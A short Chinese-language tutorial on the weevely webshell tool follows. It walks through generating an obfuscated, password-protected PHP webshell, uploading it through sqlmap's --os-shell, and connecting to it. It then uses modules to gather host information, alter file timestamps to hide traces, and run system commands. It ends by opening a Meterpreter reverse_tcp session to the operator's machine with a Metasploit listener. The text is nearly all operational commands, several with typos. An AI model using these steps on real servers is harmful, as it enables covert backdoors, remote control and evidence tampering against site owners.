提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试
Kali系统应该是集成了weevely,如果没有或者使用其他的Linux系统,自己安装一下就可以了。
#确保安装了 python 包管理器和 yaml 库
$ sudo apt-get install -y python3 python3-pip curl
$ cd weevely3/
$ sudo pip3 install -r requirements.txt --upgrade
生成Shell
weevely generate <password> <文件名>
//如:
weevely generate 123456 shell.php
连接Shell
weevely <URL> <password> [cmd]
//如
weevey http://xxxx.com/shell.php 123456
生成混淆Shell
weevely generate -obfuscator cleartext1_php <password> <文件名>
//如:
weevely generate -obfuscator cleartext1_php 123456 shell.php
1、使用weevely生成webshell文件,如文件名 shell.php,密码 123456
2、使用sqlmap的 --os-shell命令,拿到shell以及上传文件的后门地址
3、将weevely生成的shell.php文件上传,再使用weevely + url + 密码 进行连接
:system_info //收集系统信息模块,如下
:system_info -info client_ip //查找自己连接IP
:file_touch //修改文件时间模块,如下
:file_touch -human-ts '2022-04-20 20:30:21' 文件名
:shell_php //执行PHP命令模块,如下
:shell_php system('ipconfig');
//在终端1中,生成meterpreter会话
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -Ihost 本机IP -port 端口
//在终端2中,启动MSF,并设置监听会话,直到会话转移过来
service postgresq start //启动postgresql数据库
msfdb reinit //初始化msfdb
msfdb start //启动msfdb
msfconsole //启动msf
use exploit multi/handler
show paylaods
set payload php/meterpreter/reverse_top
show options
set Ihost 本机IP
run